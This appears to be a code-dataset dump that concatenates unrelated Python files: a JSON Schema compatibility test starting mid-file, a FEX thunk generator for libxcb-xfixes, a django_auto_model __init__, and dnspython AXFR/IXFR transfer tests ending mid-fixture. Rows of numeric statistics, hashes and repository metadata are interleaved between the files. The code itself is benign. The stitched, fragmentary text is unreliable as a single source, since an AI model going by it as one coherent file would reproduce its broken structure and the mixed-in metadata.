reader=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
writer=A_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
# - the writer accepts any value for `a`
# - the reader requires it to be an `int`, therefore the other values
# become invalid
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
# - the writer has property `b`
# - the reader only accepts properties whose names match the regex `a*`
not_schemas_are_compatible(
reader=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
writer=B_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
def test_object_properties() -> None:
not_schemas_are_compatible(
reader=A_OBJECT_SCHEMA,
writer=OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=A_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
reader=B_INT_OBJECT_SCHEMA,
writer=OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
def test_property_names() -> None:
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
not_schemas_are_compatible(
reader=A_OBJECT_SCHEMA,
writer=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
schemas_are_compatible(
reader=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
writer=A_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
# - the writer accepts any value for `a`
# - the reader requires it to be an `int`, therefore the other values
# become invalid
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
# - the writer has property `b`
# - the reader constrains property names with the regex `a*` (which, being
# unanchored, also matches `b`)
schemas_are_compatible(
reader=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
writer=B_INT_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
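# The contrast between the two tests above, sketched with assumed shapes
# (the real constants may differ):
#   patternProperties: {"type": "object", "patternProperties": {"a*": {...}}}
#       constrains the *values* of keys that match the pattern
#   propertyNames:     {"type": "object", "propertyNames": {"pattern": "a*"}}
#       constrains only the key strings themselves
# Since JSON Schema patterns are unanchored, `a*` matches any name
# (including `b`), which is why the propertyNames case stays compatible.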
def test_type_with_list() -> None:
# "type": [] is treated as a shortcut for anyOf
schemas_are_compatible(
reader=STRING_SCHEMA,
writer=TYPES_STRING_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
schemas_are_compatible(
reader=TYPES_STRING_INT_SCHEMA,
writer=TYPES_STRING_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
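# Spelled out, the shortcut above means (illustrative only):
#   {"type": ["string", "integer"]}
# behaves like
#   {"anyOf": [{"type": "string"}, {"type": "integer"}]}
# so widening the reader's type list keeps accepting everything the writer
# can produce.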
def test_ref() -> None:
schemas_are_compatible(
reader=ARRAY_OF_POSITIVE_INTEGER,
writer=ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF,
msg="the schemas are the same",
)
schemas_are_compatible(
reader=ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF,
writer=ARRAY_OF_POSITIVE_INTEGER,
msg="the schemas are the same",
)
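# A hedged sketch of the two equivalent spellings assumed above:
#   ARRAY_OF_POSITIVE_INTEGER ~
#       {"type": "array", "items": {"type": "integer", "exclusiveMinimum": 0}}
#   ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF ~
#       {"type": "array", "items": {"$ref": "#/definitions/positiveInteger"},
#        "definitions": {"positiveInteger": {"type": "integer",
#                                            "exclusiveMinimum": 0}}}
# After $ref resolution both describe the same value space, hence "the
# schemas are the same" in both directions.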
| 32.449422 | 125 | 0.724382 | 5,405 | 44,910 | 5.454579 | 0.039223 | 0.081745 | 0.161454 | 0.145513 | 0.870735 | 0.830168 | 0.808222 | 0.776338 | 0.742724 | 0.679669 | 0 | 0.000658 | 0.222155 | 44,910 | 1,383 | 126 | 32.472885 | 0.8433 | 0.070207 | 0 | 0.711093 | 0 | 0 | 0.027889 | 0.007056 | 0 | 0 | 0 | 0 | 0.001656 | 1 | 0.019868 | false | 0 | 0.003311 | 0 | 0.023179 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
297de43283a799a3659859337f41ee72f18c4097 | 13,482 | py | Python | ThunkLibs/Generators/libxcb_xfixes.py | cobalt2727/FEX | 13087f8425aeaad28dc81bed46a83e1d72ff0db8 | [
"MIT"
] | 628 | 2020-03-06T14:01:32.000Z | 2022-03-31T06:35:14.000Z | ThunkLibs/Generators/libxcb_xfixes.py | cobalt2727/FEX | 13087f8425aeaad28dc81bed46a83e1d72ff0db8 | [
"MIT"
] | 576 | 2020-03-06T08:25:12.000Z | 2022-03-30T04:05:29.000Z | ThunkLibs/Generators/libxcb_xfixes.py | cobalt2727/FEX | 13087f8425aeaad28dc81bed46a83e1d72ff0db8 | [
"MIT"
] | 38 | 2020-03-07T06:10:00.000Z | 2022-03-29T09:27:36.000Z | #!/usr/bin/python3
from ThunkHelpers import *
lib_with_filename("libxcb_xfixes", "0", "libxcb-xfixes")
# FEX
fn("void FEX_xcb_xfixes_init_extension(xcb_connection_t *, xcb_extension_t *)"); no_unpack()
fn("size_t FEX_usable_size(void*)"); no_unpack()
fn("void FEX_free_on_host(void*)"); no_unpack()
fn("xcb_xfixes_query_version_cookie_t xcb_xfixes_query_version(xcb_connection_t *, uint32_t, uint32_t)"); no_pack()
fn("xcb_xfixes_query_version_cookie_t xcb_xfixes_query_version_unchecked(xcb_connection_t *, uint32_t, uint32_t)"); no_pack()
fn("xcb_xfixes_query_version_reply_t * xcb_xfixes_query_version_reply(xcb_connection_t *, xcb_xfixes_query_version_cookie_t, xcb_generic_error_t **)"); no_pack()
fn("xcb_void_cookie_t xcb_xfixes_change_save_set_checked(xcb_connection_t *, uint8_t, uint8_t, uint8_t, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_change_save_set(xcb_connection_t *, uint8_t, uint8_t, uint8_t, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_select_selection_input_checked(xcb_connection_t *, xcb_window_t, xcb_atom_t, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_select_selection_input(xcb_connection_t *, xcb_window_t, xcb_atom_t, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_select_cursor_input_checked(xcb_connection_t *, xcb_window_t, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_select_cursor_input(xcb_connection_t *, xcb_window_t, uint32_t)")
fn("int xcb_xfixes_get_cursor_image_sizeof(const void *)")
fn("xcb_xfixes_get_cursor_image_cookie_t xcb_xfixes_get_cursor_image(xcb_connection_t *)")
fn("xcb_xfixes_get_cursor_image_cookie_t xcb_xfixes_get_cursor_image_unchecked(xcb_connection_t *)")
# ::Iterator::
fn("uint32_t * xcb_xfixes_get_cursor_image_cursor_image(const xcb_xfixes_get_cursor_image_reply_t *)")
fn("int xcb_xfixes_get_cursor_image_cursor_image_length(const xcb_xfixes_get_cursor_image_reply_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_get_cursor_image_cursor_image_end(const xcb_xfixes_get_cursor_image_reply_t *)")
fn("xcb_xfixes_get_cursor_image_reply_t * xcb_xfixes_get_cursor_image_reply(xcb_connection_t *, xcb_xfixes_get_cursor_image_cookie_t, xcb_generic_error_t **)"); no_pack()
fn("void xcb_xfixes_region_next(xcb_xfixes_region_iterator_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_region_end(xcb_xfixes_region_iterator_t)")
fn("int xcb_xfixes_create_region_sizeof(const void *, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_checked(xcb_connection_t *, xcb_xfixes_region_t, uint32_t, const xcb_rectangle_t *)")
fn("xcb_void_cookie_t xcb_xfixes_create_region(xcb_connection_t *, xcb_xfixes_region_t, uint32_t, const xcb_rectangle_t *)")
# ::Iterator::
fn("xcb_rectangle_t * xcb_xfixes_create_region_rectangles(const xcb_xfixes_create_region_request_t *)")
fn("int xcb_xfixes_create_region_rectangles_length(const xcb_xfixes_create_region_request_t *)")
fn("xcb_rectangle_iterator_t xcb_xfixes_create_region_rectangles_iterator(const xcb_xfixes_create_region_request_t *)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_bitmap_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_pixmap_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_bitmap(xcb_connection_t *, xcb_xfixes_region_t, xcb_pixmap_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_window_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_window_t, xcb_shape_kind_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_window(xcb_connection_t *, xcb_xfixes_region_t, xcb_window_t, xcb_shape_kind_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_gc_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_gcontext_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_gc(xcb_connection_t *, xcb_xfixes_region_t, xcb_gcontext_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_picture_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_render_picture_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_picture(xcb_connection_t *, xcb_xfixes_region_t, xcb_render_picture_t)")
fn("xcb_void_cookie_t xcb_xfixes_destroy_region_checked(xcb_connection_t *, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_destroy_region(xcb_connection_t *, xcb_xfixes_region_t)")
fn("int xcb_xfixes_set_region_sizeof(const void *, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_region_checked(xcb_connection_t *, xcb_xfixes_region_t, uint32_t, const xcb_rectangle_t *)")
fn("xcb_void_cookie_t xcb_xfixes_set_region(xcb_connection_t *, xcb_xfixes_region_t, uint32_t, const xcb_rectangle_t *)")
# ::Iterator::
fn("xcb_rectangle_t * xcb_xfixes_set_region_rectangles(const xcb_xfixes_set_region_request_t *)")
fn("int xcb_xfixes_set_region_rectangles_length(const xcb_xfixes_set_region_request_t *)")
fn("xcb_rectangle_iterator_t xcb_xfixes_set_region_rectangles_iterator(const xcb_xfixes_set_region_request_t *)")
fn("xcb_void_cookie_t xcb_xfixes_copy_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_copy_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_union_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_union_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_intersect_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_intersect_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_subtract_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_subtract_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_invert_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_rectangle_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_invert_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_rectangle_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_translate_region_checked(xcb_connection_t *, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_translate_region(xcb_connection_t *, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_region_extents_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_region_extents(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("int xcb_xfixes_fetch_region_sizeof(const void *)")
fn("xcb_xfixes_fetch_region_cookie_t xcb_xfixes_fetch_region(xcb_connection_t *, xcb_xfixes_region_t)")
fn("xcb_xfixes_fetch_region_cookie_t xcb_xfixes_fetch_region_unchecked(xcb_connection_t *, xcb_xfixes_region_t)")
# ::Iterator::
fn("xcb_rectangle_t * xcb_xfixes_fetch_region_rectangles(const xcb_xfixes_fetch_region_reply_t *)")
fn("int xcb_xfixes_fetch_region_rectangles_length(const xcb_xfixes_fetch_region_reply_t *)")
fn("xcb_rectangle_iterator_t xcb_xfixes_fetch_region_rectangles_iterator(const xcb_xfixes_fetch_region_reply_t *)")
fn("xcb_xfixes_fetch_region_reply_t * xcb_xfixes_fetch_region_reply(xcb_connection_t *, xcb_xfixes_fetch_region_cookie_t, xcb_generic_error_t **)"); no_pack()
fn("xcb_void_cookie_t xcb_xfixes_set_gc_clip_region_checked(xcb_connection_t *, xcb_gcontext_t, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_gc_clip_region(xcb_connection_t *, xcb_gcontext_t, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_window_shape_region_checked(xcb_connection_t *, xcb_window_t, xcb_shape_kind_t, int16_t, int16_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_window_shape_region(xcb_connection_t *, xcb_window_t, xcb_shape_kind_t, int16_t, int16_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_picture_clip_region_checked(xcb_connection_t *, xcb_render_picture_t, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_picture_clip_region(xcb_connection_t *, xcb_render_picture_t, xcb_xfixes_region_t, int16_t, int16_t)")
fn("int xcb_xfixes_set_cursor_name_sizeof(const void *)")
fn("xcb_void_cookie_t xcb_xfixes_set_cursor_name_checked(xcb_connection_t *, xcb_cursor_t, uint16_t, const char *)")
fn("xcb_void_cookie_t xcb_xfixes_set_cursor_name(xcb_connection_t *, xcb_cursor_t, uint16_t, const char *)")
# ::Iterator::
fn("char * xcb_xfixes_set_cursor_name_name(const xcb_xfixes_set_cursor_name_request_t *)")
fn("int xcb_xfixes_set_cursor_name_name_length(const xcb_xfixes_set_cursor_name_request_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_set_cursor_name_name_end(const xcb_xfixes_set_cursor_name_request_t *)")
fn("int xcb_xfixes_get_cursor_name_sizeof(const void *)")
fn("xcb_xfixes_get_cursor_name_cookie_t xcb_xfixes_get_cursor_name(xcb_connection_t *, xcb_cursor_t)")
fn("xcb_xfixes_get_cursor_name_cookie_t xcb_xfixes_get_cursor_name_unchecked(xcb_connection_t *, xcb_cursor_t)")
# ::Iterator::
fn("char * xcb_xfixes_get_cursor_name_name(const xcb_xfixes_get_cursor_name_reply_t *)")
fn("int xcb_xfixes_get_cursor_name_name_length(const xcb_xfixes_get_cursor_name_reply_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_get_cursor_name_name_end(const xcb_xfixes_get_cursor_name_reply_t *)")
fn("xcb_xfixes_get_cursor_name_reply_t * xcb_xfixes_get_cursor_name_reply(xcb_connection_t *, xcb_xfixes_get_cursor_name_cookie_t, xcb_generic_error_t **)"); no_pack()
fn("int xcb_xfixes_get_cursor_image_and_name_sizeof(const void *)")
fn("xcb_xfixes_get_cursor_image_and_name_cookie_t xcb_xfixes_get_cursor_image_and_name(xcb_connection_t *)")
fn("xcb_xfixes_get_cursor_image_and_name_cookie_t xcb_xfixes_get_cursor_image_and_name_unchecked(xcb_connection_t *)")
# ::Iterator::
fn("uint32_t * xcb_xfixes_get_cursor_image_and_name_cursor_image(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("int xcb_xfixes_get_cursor_image_and_name_cursor_image_length(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_get_cursor_image_and_name_cursor_image_end(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
# ::Iterator::
fn("char * xcb_xfixes_get_cursor_image_and_name_name(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("int xcb_xfixes_get_cursor_image_and_name_name_length(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_get_cursor_image_and_name_name_end(const xcb_xfixes_get_cursor_image_and_name_reply_t *)")
fn("xcb_xfixes_get_cursor_image_and_name_reply_t * xcb_xfixes_get_cursor_image_and_name_reply(xcb_connection_t *, xcb_xfixes_get_cursor_image_and_name_cookie_t, xcb_generic_error_t **)") ; no_pack()
fn("xcb_void_cookie_t xcb_xfixes_change_cursor_checked(xcb_connection_t *, xcb_cursor_t, xcb_cursor_t)")
fn("xcb_void_cookie_t xcb_xfixes_change_cursor(xcb_connection_t *, xcb_cursor_t, xcb_cursor_t)")
fn("int xcb_xfixes_change_cursor_by_name_sizeof(const void *)")
fn("xcb_void_cookie_t xcb_xfixes_change_cursor_by_name_checked(xcb_connection_t *, xcb_cursor_t, uint16_t, const char *)")
fn("xcb_void_cookie_t xcb_xfixes_change_cursor_by_name(xcb_connection_t *, xcb_cursor_t, uint16_t, const char *)")
# ::Iterator::
fn("char * xcb_xfixes_change_cursor_by_name_name(const xcb_xfixes_change_cursor_by_name_request_t *)")
fn("int xcb_xfixes_change_cursor_by_name_name_length(const xcb_xfixes_change_cursor_by_name_request_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_change_cursor_by_name_name_end(const xcb_xfixes_change_cursor_by_name_request_t *)")
fn("xcb_void_cookie_t xcb_xfixes_expand_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, uint16_t, uint16_t, uint16_t, uint16_t)")
fn("xcb_void_cookie_t xcb_xfixes_expand_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, uint16_t, uint16_t, uint16_t, uint16_t)")
fn("xcb_void_cookie_t xcb_xfixes_hide_cursor_checked(xcb_connection_t *, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_hide_cursor(xcb_connection_t *, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_show_cursor_checked(xcb_connection_t *, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_show_cursor(xcb_connection_t *, xcb_window_t)")
fn("void xcb_xfixes_barrier_next(xcb_xfixes_barrier_iterator_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_barrier_end(xcb_xfixes_barrier_iterator_t)")
fn("int xcb_xfixes_create_pointer_barrier_sizeof(const void *)")
fn("xcb_void_cookie_t xcb_xfixes_create_pointer_barrier_checked(xcb_connection_t *, xcb_xfixes_barrier_t, xcb_window_t, uint16_t, uint16_t, uint16_t, uint16_t, uint32_t, uint16_t, const uint16_t *)")
fn("xcb_void_cookie_t xcb_xfixes_create_pointer_barrier(xcb_connection_t *, xcb_xfixes_barrier_t, xcb_window_t, uint16_t, uint16_t, uint16_t, uint16_t, uint32_t, uint16_t, const uint16_t *)")
# ::Iterator::
fn("uint16_t * xcb_xfixes_create_pointer_barrier_devices(const xcb_xfixes_create_pointer_barrier_request_t *)")
fn("int xcb_xfixes_create_pointer_barrier_devices_length(const xcb_xfixes_create_pointer_barrier_request_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_create_pointer_barrier_devices_end(const xcb_xfixes_create_pointer_barrier_request_t *)")
fn("xcb_void_cookie_t xcb_xfixes_delete_pointer_barrier_checked(xcb_connection_t *, xcb_xfixes_barrier_t)")
fn("xcb_void_cookie_t xcb_xfixes_delete_pointer_barrier(xcb_connection_t *, xcb_xfixes_barrier_t)")
Generate()
| 91.714286 | 199 | 0.865747 | 2,357 | 13,482 | 4.264743 | 0.039457 | 0.206825 | 0.155193 | 0.105054 | 0.968563 | 0.9615 | 0.922404 | 0.881218 | 0.826005 | 0.718464 | 0 | 0.009835 | 0.049696 | 13,482 | 146 | 200 | 92.342466 | 0.774742 | 0.0112 | 0 | 0 | 0 | 0.016667 | 0.922667 | 0.590059 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.008333 | 0 | 0.008333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
298080734959cb951fdc940222dd2057a5052224 | 180 | py | Python | django_auto_model/__init__.py | dipasqualew/django-auto-model | 958063b2df99e95f043b06f6a6df02fe8ccfb5de | [
"MIT"
] | null | null | null | django_auto_model/__init__.py | dipasqualew/django-auto-model | 958063b2df99e95f043b06f6a6df02fe8ccfb5de | [
"MIT"
] | 23 | 2020-10-29T07:02:00.000Z | 2021-08-02T06:03:29.000Z | django_auto_model/__init__.py | rolafium/Django-AutoModel | 958063b2df99e95f043b06f6a6df02fe8ccfb5de | [
"MIT"
] | null | null | null | """
DJANGO AUTO MODEL
Automatically create instances of your models in your tests
"""
from django_auto_model.creator import ModelCreator
from django_auto_model.shortcuts import create_model
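# Hypothetical usage sketch; create_model is re-exported above, but its
# exact signature is not shown in this module and may differ:
#
#     from django_auto_model import create_model
#     instance = create_model(MyModel)  # model instance with auto-filled fields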
| 25.714286 | 52 | 0.833333 | 27 | 180 | 5.37037 | 0.518519 | 0.206897 | 0.310345 | 0.262069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122222 | 180 | 6 | 53 | 30 | 0.917722 | 0.372222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
462e3a057c31859ce21f5cc1c6b3adaa03d89dd5 | 23,376 | py | Python | tests/test_xfr.py | peterthomassen/dnspython | a328265bdfcc5c14116bb008220ab7bc25cc8264 | [
"ISC"
] | 1,666 | 2015-01-02T17:46:14.000Z | 2022-03-30T07:27:32.000Z | tests/test_xfr.py | felixonmars/dnspython | 2691834df42aab74914883fdf26109aeb62ec647 | [
"ISC"
] | 591 | 2015-01-16T12:19:49.000Z | 2022-03-30T21:32:11.000Z | tests/test_xfr.py | felixonmars/dnspython | 2691834df42aab74914883fdf26109aeb62ec647 | [
"ISC"
] | 481 | 2015-01-14T04:14:43.000Z | 2022-03-30T19:28:52.000Z | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import asyncio
import pytest
import dns.asyncbackend
import dns.asyncquery
import dns.message
import dns.query
import dns.tsigkeyring
import dns.versioned
import dns.xfr
# Some tests use a "nano nameserver" for testing. It requires trio
# and threading, so try to import it and if it doesn't work, skip
# those tests.
try:
from .nanonameserver import Server
_nanonameserver_available = True
except ImportError:
_nanonameserver_available = False
class Server(object):
pass
axfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 1 2 3 4 5
'''
axfr1 = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
'''
axfr2 = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;ANSWER
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 1 2 3 4 5
'''
base = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
"""
axfr_unexpected_origin = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 7
'''
ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 2 2 3 4 5
ns2 3600 IN A 10.0.0.4
@ 3600 IN SOA foo bar 2 2 3 4 5
@ 3600 IN SOA foo bar 3 2 3 4 5
ns3 3600 IN A 10.0.0.3
@ 3600 IN SOA foo bar 3 2 3 4 5
@ 3600 IN NS ns2
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
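# For reference (RFC 1995), an IXFR answer is shaped like the message above:
# it opens with the target-version SOA, then repeats
# [old SOA, deleted RRs, new SOA, added RRs] for each diff (serials
# 1 -> 2 -> 3 -> 4 here), and closes with the target SOA again.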
compressed_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN NS ns2
@ 3600 IN SOA foo bar 4 2 3 4 5
ns2 3600 IN A 10.0.0.4
ns3 3600 IN A 10.0.0.3
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
ixfr_expected = """@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN NS ns1
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.4
ns3 3600 IN A 10.0.0.3
"""
ixfr_first_message = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
ixfr_header = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;ANSWER
'''
ixfr_body = [
'@ 3600 IN SOA foo bar 1 2 3 4 5',
'bar.foo 300 IN MX 0 blaz.foo',
'ns2 3600 IN A 10.0.0.2',
'@ 3600 IN SOA foo bar 2 2 3 4 5',
'ns2 3600 IN A 10.0.0.4',
'@ 3600 IN SOA foo bar 2 2 3 4 5',
'@ 3600 IN SOA foo bar 3 2 3 4 5',
'ns3 3600 IN A 10.0.0.3',
'@ 3600 IN SOA foo bar 3 2 3 4 5',
'@ 3600 IN NS ns2',
'@ 3600 IN SOA foo bar 4 2 3 4 5',
'@ 3600 IN SOA foo bar 4 2 3 4 5',
]
ixfrs = [ixfr_first_message]
ixfrs.extend([ixfr_header + l for l in ixfr_body])
good_empty_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
'''
retry_tcp_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 5 2 3 4 5
'''
bad_empty_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
unexpected_end_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN NS ns2
@ 3600 IN SOA foo bar 3 2 3 4 5
ns2 3600 IN A 10.0.0.4
